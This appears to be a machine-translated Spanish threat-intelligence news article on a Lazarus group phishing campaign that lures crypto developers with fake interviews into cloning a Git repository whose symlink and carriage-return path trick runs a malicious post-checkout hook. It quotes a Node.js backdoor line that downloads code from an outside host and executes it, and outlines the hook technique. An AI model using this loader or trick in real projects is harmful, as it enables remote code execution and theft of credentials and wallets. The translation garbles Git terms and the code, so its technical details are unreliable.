A principios de este mes, los investigadores de ciberseguridad descubrieron una nueva campaña de phishing atribuida al grupo Lázaro que se dirige a los desarrolladores y profesionales de criptografía a través de una vulnerabilidad de enlace simbólico GIT inteligentemente elaborada.
En lugar de confiar únicamente en los canales de distribución de malware tradicionales, los atacantes han armado la forma en que GIT maneja las rutas de repositorio, integrando ganchos maliciosos dentro de los enlaces simbólicos para activar la ejecución del código durante las operaciones de rutina.
Esta técnica permite a los atacantes mantener un perfil bajo al tiempo que compromete los objetivos de alto valor que suponen que sus flujos de trabajo de desarrollo son inmunes a la ingeniería social.
El señuelo inicial comienza con mensajes personalizados en plataformas de redes profesionales, donde las posibles víctimas están invitadas a participar en una entrevista técnica simulada.
La conversación está estructurada para ganar la confianza de la víctima y convencerlos para que ejecute un solo comando Git Clone.
Además de esto, el repositorio contiene un directorio anidado llamado API/DB_DRIVS que en realidad es un enlace simbólico que apunta nuevamente al directorio del módulo .GIT del repositorio.
Esta estructura engañosa asegura que una vez que GIT realice una operación de pago, ejecuta involuntariamente el script de gancho personalizado del atacante.
Analistas de Kucoin anotado Las primeras instancias de este vector de ataque a fines de agosto, luego de informes de repositorios privados de Gitlab comprometidos.
El análisis detallado reveló que la exploit de enlace simbólico aprovecha el mecanismo de gancho posterior a la verificación de Git para iniciar una puerta trasera oculta.
Al incrustar un script posterior a la verificación maliciosa dentro del enlace simbólico, los atacantes logran la ejecución del código sin modificar la base de código principal, evadiendo así las verificaciones de integridad estándar y los escáneres estáticos.
El examen forense posterior confirmó que la carga útil establece una conexión encriptada a un servidor remoto de comando y control, credenciales de desvío, información del sistema y datos de billetera a los actores de amenaza.
Diagrama de flujo de ataque (no técnico) (fuente-Kucoin)
La sofisticación del exploit radica en su integración perfecta con flujos de trabajo legítimos. Las víctimas informan que después de ejecutar:-
Git Clone -HTTPS -RECURSIVO: // Invitado: (correo electrónico protegido) /product/delivery.git Producto/entrega de CD
El gancho malicioso se activa automáticamente. El script incrustado, ganchos/posteriores a la verificación, invoca una puerta trasera node.js:-
const vm = require (‘vm’); const https = require (‘https’); https.get (‘https://gitlab.tresalabs.com:8443/api/v4/project’, res => {let data = “”; res.on (‘data’, chunk => data += chunk); res.on (‘end’, () => vm.runinnewcontext (buffer.from (json.parse (data). ‘base64’)));
Una vez implementado, esta puerta trasera mantiene la persistencia al limpiar y reemplazar los archivos del proyecto para eliminar signos obvios de manipulación, asegurando que los desarrolladores solo vean el código esperado.
Mecanismo de infección Dive Deep Dive
La infección se desarrolla en dos fases coordinadas: explotación de la resolución de ruta de Git y la ejecución de gancho sigiloso.
Primero, los atacantes crean un repositorio con una entrada de directorio llamada API/DB_DRIVS^M, explotando el manejo de retorno de carro para escribir la ruta como API/DB_DRIVS en el disco mientras conserva el objetivo de enlace simbólico internamente.
Diagrama de flujo de ataque (técnico) (fuente – Kucoin)
Esta discrepancia confunde GIT para tratar la ruta como un directorio regular durante el recorrido pero como un enlace al inicializar los ganchos.
A medida que GIT realiza el pago predeterminado, sigue el enlace SYMS oculto en el .git/módulos/api/db_drivers/gooks/directorio y ejecuta el script posterior a la verificación.
Al explotar un comportamiento fundamental de GIT, el grupo Lázaro ha demostrado un nuevo nivel de ingenio técnico, combinando el compromiso de la cadena de suministro con la ingeniería social para atacar a las personas de alto valor.
La campaña sirve como un marcado recordatorio de que incluso las herramientas de desarrollo más confiables se pueden armarse cuando las suposiciones sobre la integridad del flujo de trabajo no se cuestionan.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
